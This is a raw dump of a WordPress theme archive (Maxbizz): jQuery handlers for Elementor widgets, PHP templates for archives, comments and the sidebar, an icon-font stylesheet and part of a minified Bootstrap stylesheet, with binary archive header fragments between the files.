            var counter     = $(this).find('span.num'),
                countTo     = counter.attr('data-to'),
                during      = parseInt( counter.attr('data-time') );

            if ( scrollTop > counter.offset().top + counter.height() ) {
                $(this).removeAttr('data-counter');
                $({
                    countNum: counter.text()
                }).animate({
                    countNum: countTo
                },
                {
                    duration: during,
                    easing: 'swing',
                    step: function() {
                        counter.text(Math.floor(this.countNum));
                    },
                    complete: function() {
                        counter.text(this.countNum);
                    }
                });
            }
        });
    };

    /* --------------------------------------------------
    * coming soon
    * --------------------------------------------------*/
    var countDown = function($scope, $){
        $scope.find('.ot-countdown').each( function(){
            var selector = $(this),
                date     = selector.data('date'),
                zone     = selector.data('zone'),
                day      = selector.data('day'),
                days     = selector.data('days'),
                hour     = selector.data('hour'),
                hours    = selector.data('hours'),
                min      = selector.data('min'),
                mins     = selector.data('mins'),
                second   = selector.data('second'),
                seconds  = selector.data('seconds');
            selector.countdown({
                date: date,
                offset: zone,
                day: day,
                days: days,
                hour: hour,
                hours: hours,
                minute: min,
                minutes: mins,
                second: second,
                seconds: seconds
            }, function () {
                alert('Done!');
            });
        });
    };

    /* --------------------------------------------------
     * client logos
     * --------------------------------------------------*/
    var clientLogos = function ($scope, $) {
        $scope.find('.logos-carousel').each( function () {
            var $this     = $(this),
                $loop     = $this.data('loop'),
                $auto     = $this.data('auto'),
                $time     = $this.data('time'),
                $dots     = $this.data('dots'),
                $nav      = $this.data('arrows'),
                $items    = $this.data('show') ? $this.data('show') : 2,
                $titems   = $this.data('tshow') ? $this.data('tshow') : 2,
                $mitems   = $this.data('mshow') ? $this.data('mshow') : 2,
                $gaps     = $this.data('gaps') !== '' ? $this.data('gaps') : 70,
                $tgaps    = $this.data('tgaps') !== '' ? $this.data('tgaps') : 50,
                $mgaps    = $this.data('mgaps') !== '' ? $this.data('mgaps') : 30,
                $selector = $this.find('.owl-carousel');
            $selector.owlCarousel({
                rtl: rtl_owl(),
                autoplay:$auto,
                autoplayTimeout: $time,
                loop:$loop,
                responsiveClass:true,
                dots:$dots,
                nav:$nav,
                navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-trajectory"></i>'],
                responsive : {
                    0 : {
                        margin:$mgaps,
                        items:$mitems,
                    },
                    768 : {
                        margin:$tgaps,
                        items:$titems,
                    },
                    1024 : {
                        margin:$gaps,
                        items:$items,
                    }
                }
            });
        });
    };

    /* --------------------------------------------------
     * testimonials carousel
     * --------------------------------------------------*/
    var testiCarousel = function ($scope, $) {
        $scope.find('.ot-testimonials-carousel').each( function () {
            var $this     = $(this),
                $loop     = $this.data('loop'),
                $auto     = $this.data('auto'),
                $time     = $this.data('time'),
                $dots     = $this.data('dots'),
                $nav      = $this.data('arrows'),
                $items    = $this.data('show') ? $this.data('show') : 3,
                $titems   = $this.data('tshow') ? $this.data('tshow') : 2,
                $mitems   = $this.data('mshow') ? $this.data('mshow') : 1,
                $selector = $this.find('.owl-carousel');
            $selector.owlCarousel({
                rtl: rtl_owl(),
                autoplay:$auto,
                autoplayTimeout: $time,
                loop:$loop,
                responsiveClass:true,
                margin:30,
                dots:$dots,
                nav:$nav,
                navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-trajectory"></i>'],
                responsive : {
                    0 : {
                        items:$mitems,
                    },
                    768 : {
                        items:$titems,
                    },
                    1024 : {
                        items:$items,
                    }
                }
            });
        });
    };

    /* --------------------------------------------------
     * testimonials carousel 2
     * --------------------------------------------------*/
    var testiCarousel2 = function ($scope, $) {
        $scope.find('.ot-testimonials-carousel-2').each( function () {
            var $this     = $(this),
                $loop     = $this.data('loop'),
                $auto     = $this.data('auto'),
                $time     = $this.data('time'),
                $dots     = $this.data('dots'),
                $nav      = $this.data('arrows'),
                $selector = $this.find('.owl-carousel');
            $selector.owlCarousel({
                rtl: rtl_owl(),
                autoplay:$auto,
                autoplayTimeout: $time,
                loop:$loop,
                responsiveClass:true,
                animateOut: 'fadeOut',
                animateIn: 'fadeIn',
                margin:30,
                items:1,
                dots:$dots,
                nav:$nav,
                navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-trajectory"></i>'],
            });
        });
    };

    /* --------------------------------------------------
     * progress bar
     * --------------------------------------------------*/
    function lineProgress() {
        $('.line-progress:not([data-processed])').each(function() {
            var bar = $(this),
                line = bar.find(".progress-bar"),
                progressEnd = bar.data('percent'),
                percent = bar.find('.percent');
            var scrollTop = $(document).scrollTop() + $(window).height();

            if ( scrollTop >  bar.offset().top +  bar.height() ) {
                bar.attr("data-processed", "true");
                line.css("width", (bar.outerWidth() * (progressEnd / 100)) + "px");

                for (var i = 0; i <= 50; i++) {
                    (function (count) {
                        setTimeout(function () {
                            percent.html(Math.round((progressEnd / 50) * count) + "%");
                        }, 30 * count);
                    })(i);
                }
            }
        });
    };

    /* line progress */
    function lineProgressSize() {
        $('.line-progress[data-processed]').each(function () {
            var bar = $(this);
            var line = bar.find(".progress-bar");
            var progressEnd = parseInt(bar.data('percent'));

            line.css("width", (bar.outerWidth() * (progressEnd / 100)) + "px");
        
        });
    }

    /* circle progress */
    function circleProgress() {
        $('.circle-progress:not([data-processed])').each(function() {
            var circle    = $(this),
                bar_color = circle.data('color'),
                bar_hei   = circle.data('height'),
                bar_size  = circle.data('size');
            var scrollTop = $(document).scrollTop() + $(window).height();
            if ( scrollTop >  circle.offset().top +  circle.height() ) {
                circle.attr("data-processed", "true");
                circle.find('.inner-bar').easyPieChart({
                    barColor: bar_color,
                    trackColor: false,
                    scaleColor: false,
                    lineCap: 'square',
                    lineWidth: bar_hei,
                    size: bar_size,
                    animate: 1000,
                    onStart: $.noop,
                    onStop: $.noop,
                    easing: 'easeOutBounce',
                    onStep: function(from, to, percent) {
                        $(this.el).find('.percent').text(Math.round(percent) + '%');
                    }
                });
            }
        });
    };
    
    var progressBar = function () {
        lineProgress();
        circleProgress();
    };

    /* --------------------------------------------------
	* projects filter isotope
	* --------------------------------------------------*/
         
    var projectsFilter = function () {
        function updateFilter() {
            $('.project_filters a').each(function() {
                var data_filter = this.getAttribute('data-filter');
                var num = $(this)
                    .closest('.project-filter-wrapper')
                    .find('.project-item')
                    .filter(data_filter).length;
                $(this)
                    .find('.filter-count')
                    .text( num );
            });
        }
        $('.projects-grid').each( function(){
            var $container = $(this); 
            $container.imagesLoaded(function(){
                $container.isotope({ 
                    itemSelector : '.project-item', 
                    animationEngine : 'css',
                    masonry: {
                        columnWidth: '.grid-sizer'
                    },
                    isOriginLeft: rtl_isotop(),
                });
            });
    
            var $optionSets  = $(this).closest('.project-filter-wrapper').find('.project_filters'),
                $optionLinks = $optionSets.find('a');
    
            $optionLinks.on('click', function(){
                var $this = $(this);
    
                if ( $this.hasClass('selected') ) {
                    return false;
                }
                var $optionSet = $this.parents('.project_filters');
                    $optionSet.find('.selected').removeClass('selected');
                    $this.addClass('selected');
    
                var selector = $(this).attr('data-filter');
                    $container.isotope({ 
                        filter: selector 
                    });
                return false;
            });
            /* popup gallery */
            if( $container.hasClass('img-popup') ){
                $('.img-popup').lightGallery({
                    selector: '.projects-thumbnail',
                    share: false,
                    pager: false,
                    thumbnail: false
                });
            }
            /* count filters */
            updateFilter();
        });
    };

    /* --------------------------------------------------
    * projects carousel
    * --------------------------------------------------*/
    var projectsCarousel = function ($scope, $) {
        $scope.find('.project-slider').each( function () {
            var $this     = $(this),
                $loop     = $this.data('loop'),
                $auto     = $this.data('auto'),
                $time     = $this.data('time'),
                $center   = $this.data('center'),
                $dots     = $this.data('dots'),
                $nav      = $this.data('arrows'),
                $items    = $this.data('show') ? $this.data('show') : 2,
                $titems   = $this.data('tshow') ? $this.data('tshow') : 2,
                $mitems   = $this.data('mshow') ? $this.data('mshow') : 2,
                $gaps     = $this.data('gaps') !== '' ? $this.data('gaps') : 60,
                $tgaps    = $this.data('tgaps') !== '' ? $this.data('tgaps') : 40,
                $mgaps    = $this.data('mgaps') !== '' ? $this.data('mgaps') : 20,
                $selector = $this.find('.owl-carousel');
            $selector.owlCarousel({
                rtl: rtl_owl(),
                autoplay:$auto,
                autoplayTimeout: $time,
                center:$center,
                loop:$loop,
                responsiveClass:true,
                dots:$dots,
                nav:$nav,
                navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-trajectory"></i>'],
                responsive : {
                    0 : {
                        margin:$mgaps,
                        items:$mitems,
                    },
                    768 : {
                        margin:$tgaps,
                        items:$titems,
                    },
                    1024 : {
                        margin:$gaps,
                        items:$items,
                    }
                }
            });
        });
    };

    /* --------------------------------------------------
    * posts carousel
    * --------------------------------------------------*/
    var postCarousel = function ($scope, $) {
        $scope.find('.post-slider').each( function () {
            var $this     = $(this),
                $loop     = $this.data('loop'),
                $auto     = $this.data('auto'),
                $time     = $this.data('time'),
                $dots     = $this.data('dots'),
                $nav      = $this.data('arrows'),
                $items    = $this.data('show') ? $this.data('show') : 3,
                $titems   = $this.data('tshow') ? $this.data('tshow') : 2,
                $mitems   = $this.data('mshow') ? $this.data('mshow') : 1,
                $gaps     = $this.data('gaps') !== '' ? $this.data('gaps') : 30,
                $tgaps    = $this.data('tgaps') !== '' ? $this.data('tgaps') : 30,
                $mgaps    = $this.data('mgaps') !== '' ? $this.data('mgaps') : 30,
                $selector = $this.find('.owl-carousel');
            $selector.owlCarousel({
                rtl: rtl_owl(),
                autoplay:$auto,
                autoplayTimeout: $time,
                loop:$loop,
                responsiveClass:true,
                dots:$dots,
                nav:$nav,
                navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-trajectory"></i>'],
                responsive : {
                    0 : {
                        margin:$mgaps,
                        items:$mitems,
                    },
                    768 : {
                        margin:$tgaps,
                        items:$titems,
                    },
                    1024 : {
                        margin:$gaps,
                        items:$items,
                    }
                }
            });
        });
    };

    /* --------------------------------------------------
    * team carousel
    * --------------------------------------------------*/
    var teamCarousel = function ($scope, $) {
        $scope.find('.ot-team-carousel').each( function () {
            var $this     = $(this),
                $loop     = $this.data('loop'),
                $auto     = $this.data('auto'),
                $time     = $this.data('time'),
                $dots     = $this.data('dots'),
                $nav      = $this.data('arrows'),
                $items    = $this.data('show') ? $this.data('show') : 3,
                $titems   = $this.data('tshow') ? $this.data('tshow') : 2,
                $mitems   = $this.data('mshow') ? $this.data('mshow') : 1,
                $gaps     = $this.data('gaps') !== '' ? $this.data('gaps') : 30,
                $tgaps    = $this.data('tgaps') !== '' ? $this.data('tgaps') : 30,
                $mgaps    = $this.data('mgaps') !== '' ? $this.data('mgaps') : 30,
                $selector = $this.find('.owl-carousel');
            $selector.owlCarousel({
                rtl: rtl_owl(),
                autoplay:$auto,
                autoplayTimeout: $time,
                loop:$loop,
                responsiveClass:true,
                dots:$dots,
                nav:$nav,
                navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-trajectory"></i>'],
                responsive : {
                    0 : {
                        margin:$mgaps,
                        items:$mitems,
                    },
                    768 : {
                        margin:$tgaps,
                        items:$titems,
                    },
                    1024 : {
                        margin:$gaps,
                        items:$items,
                    }
                }
            });
        });
    };

    /* --------------------------------------------------
    * image box carousel
    * --------------------------------------------------*/
    var imageboxCarousel = function ($scope, $) {
        $scope.find('.image-box-carousel').each( function () {
            var $this     = $(this),
                $loop     = $this.data('loop'),
                $auto     = $this.data('auto'),
                $time     = $this.data('time'),
                $dots     = $this.data('dots'),
                $nav      = $this.data('arrows'),
                $items    = $this.data('show') ? $this.data('show') : 3,
                $titems   = $this.data('tshow') ? $this.data('tshow') : 2,
                $mitems   = $this.data('mshow') ? $this.data('mshow') : 1,
                $gaps     = $this.data('gaps') !== '' ? $this.data('gaps') : 30,
                $tgaps    = $this.data('tgaps') !== '' ? $this.data('tgaps') : 30,
                $mgaps    = $this.data('mgaps') !== '' ? $this.data('mgaps') : 30,
                $selector = $this.find('.owl-carousel');
            $selector.owlCarousel({
                rtl: rtl_owl(),
                autoplay:$auto,
                autoplayTimeout: $time,
                loop:$loop,
                responsiveClass:true,
                dots:$dots,
                nav:$nav,
                navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-trajectory"></i>'],
                responsive : {
                    0 : {
                        margin:$mgaps,
                        items:$mitems,
                    },
                    768 : {
                        margin:$tgaps,
                        items:$titems,
                    },
                    1024 : {
                        margin:$gaps,
                        items:$items,
                    }
                }
            });
        });
    };

    /* --------------------------------------------------
    * social team
    * --------------------------------------------------*/
    var teamSocial = function ( $scope , $ ) {
        $scope.find('.team-social > span').on('click', function(){
            $(this).parent().toggleClass('active');
        });
    };

    /* --------------------------------------------------
    * video button
    * --------------------------------------------------*/
    var videoButton = function($scope, $){
        $scope.find('.ot-video-button').each( function(){
                $(this).lightGallery({
                selector: '.btn-play',
            });
        });
    }

    /* --------------------------------------------------
    * message box
    * --------------------------------------------------*/
    var messageBox = function($scope, $){
        $scope.find('.ot-message-box').each( function(){
            var selector = $(this),
                close = selector.find('>i');
            close.on('click', function() {
                $scope.fadeOut();
            });
        });
    };

    /* --------------------------------------------------
    * background list
    * --------------------------------------------------*/
    
    var featuresService = function($scope, $){
        $scope.find('.features-service-wrapper').each( function(){
            var selector = $(this),
                colHandle = selector.find('.features-service-item'),
                bgHandle = selector.find('.features-service-img');
            
                colHandle.each(function(){
                    if ($(this).data('default') == 'yes') {
                        bgHandle.removeClass('hover');
                        $(this).next().addClass('hover');
                    }
                });
               
                    colHandle.hover(
                        function() {
                            bgHandle.removeClass('hover');
                            $(this).next().addClass('hover');
                        }
                    );
                
                
        });
    };
    
    function fserviceResize(){
        var wraper = $('.features-service-wrapper');
        if(wraper.length){
            wraper.each(function () {
                var item = $(this).find('.features-service-item');
                    item.each(function () {
                        var desc = $(this).find('.features-service-desc'),
                            title = $(this).find('.features-service-title'),
                            width = $(window).width();

                        if (width > 1024){
                            var hdesc = desc.outerHeight(!0);
                            title.css({ transform: "translateY(" + hdesc + "px)" }),
                            $(this)
                                .mouseenter(function () {
                                    title.css({ transform: "translateY(0px)" });
                                })
                                .mouseleave(function () {
                                    title.css({ transform: "translateY(" + hdesc + "px)" });
                                });
                        }
                        else{
                            title.css("transform","");
                            $(this).unbind('mouseenter mouseleave');
                        }
                    });
            });
        }  
        
    }
    function fserviceResize1(){
        var wraper = $('.features-service-wrapper');
        if(wraper.length){
            wraper.each(function () {
                var item = $(this).find('.features-service-item');
                    item.each(function () {
                        var desc = $(this).find('.features-service-desc'),
                            width = $(window).width();

                        if (width > 1024){
                            desc.css("max-height","0"),
                            $(this)
                                .mouseenter(function () {
                                    desc.css( "max-height","100%" );
                                })
                                .mouseleave(function () {
                                    desc.css("max-height","0");
                                });
                        }
                        else{
                            desc.css("max-height","");
                            $(this).unbind('mouseenter mouseleave');
                        }
                    });
            });
        }  
        
    }

    /* --------------------------------------------------
    * handle after scroll/load/resize
    * --------------------------------------------------*/
    $(window).on('scroll', function() {
        lineProgress();
        circleProgress();
        iCounter();
    });

    $(window).on('load', function () {
        lineProgress();
        circleProgress();
        iCounter();
        fserviceResize();
    });

    $(window).on('resize', function () {
        lineProgressSize();
        fserviceResize();
    });

    /**
     * Elementor JS Hooks
     */
    $(window).on("elementor/frontend/init", function () {

        /* accordions*/
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/iaccordions.default",
            customAccordions
        );

        /* tabs*/
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/itabs.default",
            customTabs
        );

        /* counter */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/icounter.default",
            iCounter
        );

        /* counter 2 */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/icounter2.default",
            iCounter
        );

        /* logos carousel */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/iclogos.default",
            clientLogos
        );

        /* testimonials carousel */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/itestimonials.default",
            testiCarousel
        );

        /* testimonials carousel 2 */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/itestimonials2.default",
            testiCarousel2
        );

        /* image box carousel */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/iiboxcarousel.default",
            imageboxCarousel
        );

        /* progress bar */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/iprogress.default",
            progressBar
        );
        
        /* projects filter */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/ipfilter.default",
            projectsFilter
        );

        /* projects carousel */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/ipcarousel.default",
            projectsCarousel
        );

        /* posts carousel */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/ipostcarousel.default",
            postCarousel
        );

        /* team carousel */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/iteamcarousel.default",
            teamCarousel
        );

        /*team social*/
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/imember.default",
            teamSocial
        );

        /*countdown*/
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/icountdown.default",
            countDown
        );
        
        /* video button */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/ivideopopup.default",
            videoButton
        );

        /* message box */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/imessagebox.default",
            messageBox
        );

        /* background list */
        elementorFrontend.hooks.addAction(
            "frontend/element_ready/ifearuresservice.default",
            featuresService
        );

    });

} )( jQuery );PK�8FZu�^�||archive.phpnu�[���<?php
/**
 * The template for displaying archive pages
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

get_header(); ?>

<div class="entry-content">
	<div class="container">
		<div class="row">
			<div id="primary" class="content-area <?php maxbizz_content_columns(); ?>">
				<main id="main" class="site-main">

				<?php if ( have_posts() ) : ?>

					<?php
					/* Start the Loop */
					while ( have_posts() ) :
						the_post();

						/*
						 * Include the Post-Type-specific template for the content.
						 * If you want to override this in a child theme, then include a file
						 * called content-___.php (where ___ is the Post Type name) and that will be used instead.
						 */
						get_template_part( 'template-parts/content', get_post_type() );

					endwhile;

						maxbizz_posts_navigation();

					else :

						get_template_part( 'template-parts/content', 'none' );

					endif;
					?>

				</main><!-- #main -->
			</div><!-- #primary -->
			<?php get_sidebar(); ?>
		</div>
	</div>	
</div>

<?php
get_footer();

PK�8FZۯ��
�
comments.phpnu�[���<?php
/**
 * The template for displaying comments
 *
 * This is the template that displays the area of the page that contains both the current comments
 * and the comment form.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

/*
 * If the current post is protected by a password and
 * the visitor has not yet entered the password we will
 * return early without loading the comments.
 */
if ( post_password_required() ) {
    return;
}
?>

<div id="comments" class="comments-area">

    <?php
    // You can start editing here -- including this comment!
    if ( have_comments() ) : ?>

        <h4 class="comments-title"><?php comments_number( esc_html__('Comments (0)', 'maxbizz'), esc_html__('Comment (1)', 'maxbizz'), esc_html__(  'Comments (%)', 'maxbizz') ); ?></h4>

        <ol class="comment-list">
            <?php wp_list_comments('callback=maxbizz_comment_list'); ?>
        </ol><!-- .comment-list -->

        <?php
        the_comments_navigation();

        // If comments are closed and there are comments, let's leave a little note, shall we?
        if ( ! comments_open() ) :
            ?>
            <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'maxbizz' ); ?></p>
        <?php
        endif;

    endif; // Check for have_comments().

    // Custom comments_args here: https://codex.wordpress.org/Function_Reference/comment_form
    $commenter = wp_get_current_commenter();
    $req = get_option( 'require_name_email' );
    $aria_req = ( $req ? " aria-required='true'" : '' );

    $comments_args = array(
        'title_reply'   => esc_html__('Leave a comment', 'maxbizz'),
        'comment_field' => '<p class="comment-form-comment"><textarea id="comment" name="comment" cols="45" rows="8" aria-required="true" placeholder="'. esc_attr__( 'Comment*', 'maxbizz' ) .'" required></textarea></p>',

        'fields'        => apply_filters( 'comment_form_default_fields', array(
            'author' =>
                '<div class="row"><p class="comment-form-author col-md-6"><input id="author" name="author" type="text" value="' . esc_attr( $commenter['comment_author'] ) .
                '" size="30" placeholder="'. esc_attr__( 'Name*', 'maxbizz' ) .'" required /></p>',

            'email' =>
                '<p class="comment-form-email col-md-6"><input id="email" name="email" type="text" value="' . esc_attr(  $commenter['comment_author_email'] ) .
                '" size="30" placeholder="'. esc_attr__( 'Email*', 'maxbizz' ) .'" required /></p></div>',
        )),
        'class_submit' => 'octf-btn',
        'format'       => 'xhtml'
    );
    comment_form( $comments_args );
    ?>

</div><!-- #comments -->PK�8FZ���o��sidebar.phpnu�[���<?php
/**
 * The sidebar containing the main widget area
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Maxbizz
 */

if ( maxbizz_get_layout() === 'full-content' ) {
	return;
}

$sidebar = 'primary';

if ( ! is_active_sidebar( $sidebar ) ) {
	return;
}
?>

<aside id="primary-sidebar" class="widget-area primary-sidebar col-lg-3 col-md-3 col-sm-12 col-xs-12">
	<?php dynamic_sidebar( $sidebar ); ?>
</aside><!-- #secondary -->
PK�8FZ�ԛ�css/flaticon.cssnu�[���	/*
  	Flaticon icon font: Flaticon
  	Creation date: 02/06/2020 23:39
  	*/

@font-face {
  font-family: "Flaticon";
  src: url("../fonts/Flaticon.eot");
  src: url("../fonts/Flaticon.eot?#iefix") format("embedded-opentype"),
       url("../fonts/Flaticon.woff2") format("woff2"),
       url("../fonts/Flaticon.woff") format("woff"),
       url("../fonts/Flaticon.ttf") format("truetype"),
       url("../fonts/Flaticon.svg#Flaticon") format("svg");
  font-weight: normal;
  font-style: normal;
}

@media screen and (-webkit-min-device-pixel-ratio:0) {
  @font-face {
    font-family: "Flaticon";
    src: url("../fonts/Flaticon.svg#Flaticon") format("svg");
  }
}

[class^="ot-flaticon-"]:before, [class*=" ot-flaticon-"]:before,
[class^="ot-flaticon-"]:after, [class*=" ot-flaticon-"]:after {   
  font-family: Flaticon;
  font-style: normal;
}

.ot-flaticon-download:before { content: "\f100"; }
.ot-flaticon-search:before { content: "\f101"; }
.ot-flaticon-menu:before { content: "\f102"; }
.ot-flaticon-left-arrow:before { content: "\f103"; }
.ot-flaticon-play:before { content: "\f104"; }
.ot-flaticon-icon-121954:before { content: "\f105"; }
.ot-flaticon-phone-call:before { content: "\f106"; }
.ot-flaticon-placeholder:before { content: "\f107"; }
.ot-flaticon-check:before { content: "\f108"; }
.ot-flaticon-call:before { content: "\f109"; }
.ot-flaticon-right-arrow:before { content: "\f10a"; }
.ot-flaticon-up-arrow:before { content: "\f10b"; }
.ot-flaticon-send:before { content: "\f10c"; }
.ot-flaticon-pin:before { content: "\f10d"; }
.ot-flaticon-search-1:before { content: "\f10e"; }
.ot-flaticon-effort:before { content: "\f10f"; }
.ot-flaticon-task:before { content: "\f110"; }
.ot-flaticon-target:before { content: "\f111"; }
.ot-flaticon-strategy:before { content: "\f112"; }
.ot-flaticon-arrows:before { content: "\f113"; }
.ot-flaticon-arrows-1:before { content: "\f114"; }
.ot-flaticon-business-and-finance:before { content: "\f115"; }
.ot-flaticon-trajectory:before { content: "\f116"; }
.ot-flaticon-business-and-finance-1:before { content: "\f117"; }
.ot-flaticon-arrowsoutline:before { content: "\f118"; }
.ot-flaticon-card:before { content: "\f119"; }
.ot-flaticon-holidays:before { content: "\f11a"; }
.ot-flaticon-energy:before { content: "\f11b"; }
.ot-flaticon-award:before { content: "\f11c"; }
.ot-flaticon-badge:before { content: "\f11d"; }
.ot-flaticon-bars-chart:before { content: "\f11e"; }
.ot-flaticon-rocket:before { content: "\f11f"; }
.ot-flaticon-left-quote:before { content: "\f120"; }
.ot-flaticon-signs:before { content: "\f121"; }
.ot-flaticon-aim:before { content: "\f122"; }
.ot-flaticon-chart:before { content: "\f123"; }
.ot-flaticon-clock:before { content: "\f124"; }
.ot-flaticon-money:before { content: "\f125"; }
.ot-flaticon-interface:before { content: "\f126"; }
.ot-flaticon-symbol:before { content: "\f127"; }
.ot-flaticon-portfolio:before { content: "\f128"; }
.ot-flaticon-deal:before { content: "\f129"; }
.ot-flaticon-business:before { content: "\f12a"; }
.ot-flaticon-precious-stone:before { content: "\f12b"; }
.ot-flaticon-hourglass:before { content: "\f12c"; }
.ot-flaticon-certificate:before { content: "\f12d"; }
.ot-flaticon-arrows-2:before { content: "\f12e"; }
.ot-flaticon-share:before { content: "\f12f"; }
.ot-flaticon-files-1:before { content: "\f130"; }
.ot-flaticon-signs-1:before { content: "\f131"; }
.ot-flaticon-multimedia:before { content: "\f132"; }
.ot-flaticon-shapes-and-symbols:before { content: "\f133"; }
.ot-flaticon-like:before { content: "\f134"; }
.ot-flaticon-close:before { content: "\f135"; }
.ot-flaticon-document:before { content: "\f136"; }
.ot-flaticon-star:before { content: "\f137"; }
.ot-flaticon-null:before { content: "\f138"; }
.ot-flaticon-null-1:before { content: "\f139"; }
.ot-flaticon-null-2:before { content: "\f13a"; }
.ot-flaticon-null-3:before { content: "\f13b"; }
.ot-flaticon-tablet:before { content: "\f13c"; }
.ot-flaticon-illustration:before { content: "\f13d"; }
.ot-flaticon-search-2:before { content: "\f13e"; }
.ot-flaticon-paint:before { content: "\f13f"; }
.ot-flaticon-adjust:before { content: "\f140"; }
.ot-flaticon-vision:before { content: "\f141"; }
.ot-flaticon-cancel:before { content: "\f142"; }
.ot-flaticon-next:before { content: "\f143"; }
.ot-flaticon-arrow-pointing-to-left:before { content: "\f144"; }
.ot-flaticon-left-arrow-2:before { content: "\f145"; }
.ot-flaticon-facebook:before { content: "\f146"; }
.ot-flaticon-instagram:before { content: "\f147"; }
.ot-flaticon-twitter:before { content: "\f148"; }
.ot-flaticon-linkedin:before { content: "\f149"; }
.ot-flaticon-pinterest:before { content: "\f14a"; }
.ot-flaticon-google-plus:before { content: "\f14b"; }
.ot-flaticon-dribble:before { content: "\f14c"; }
.ot-flaticon-behance:before { content: "\f14d"; }
.ot-flaticon-youtube:before { content: "\f14e"; }
.ot-flaticon-refresh:before { content: "\f14f"; }PK�8FZ��J�/�/css/bootstrap.cssnu�[��� /*!
 * Bootstrap v3.3.7 (http://getbootstrap.com)
 * Copyright 2011-2018 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 *//*!
 * Generated using the Bootstrap Customizer (<none>)
 * Config saved to config.json and <none>
 *//*!
 * Bootstrap v3.3.7 (http://getbootstrap.com)
 * Copyright 2011-2016 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */hr,img,legend{border:0}legend,td,th{padding:0}body,figure{margin:0}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent;color:#337ab7;text-decoration:none}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,optgroup,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}.img-thumbnail,body{background-color:#fff}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{vertical-align:middle}svg:not(:root){overflow:hidden}hr{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre,textarea{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input[type=checkbox],input[type=radio]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}input[type=search]{-webkit-appearance:textfield;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}table{border-collapse:collapse;border-spacing:0}*,:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.42857143;color:#333}button,input,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:-webkit-focus-ring-color auto 5px;outline-offset:-2px}.img-responsive{display:block;max-width:100%;height:auto}.img-rounded{border-radius:6px}.img-thumbnail{padding:4px;line-height:1.42857143;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;-o-transition:all .2s ease-in-out;transition:all .2s ease-in-out;display:inline-block;max-width:100%;height:auto}.img-circle{border-radius:50%}hr{margin-top:20px;margin-bottom:20px;border-top:1px solid #eee}.sr-only{position:absolute;width:1px;height:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}.container,.container-fluid{margin-right:auto;margin-left:auto;padding-left:15px;padding-right:15px}[role=button]{cursor:pointer}@media (min-width:768px){.container{width:750px}}@media (min-width:992px){.container{width:970px}}@media 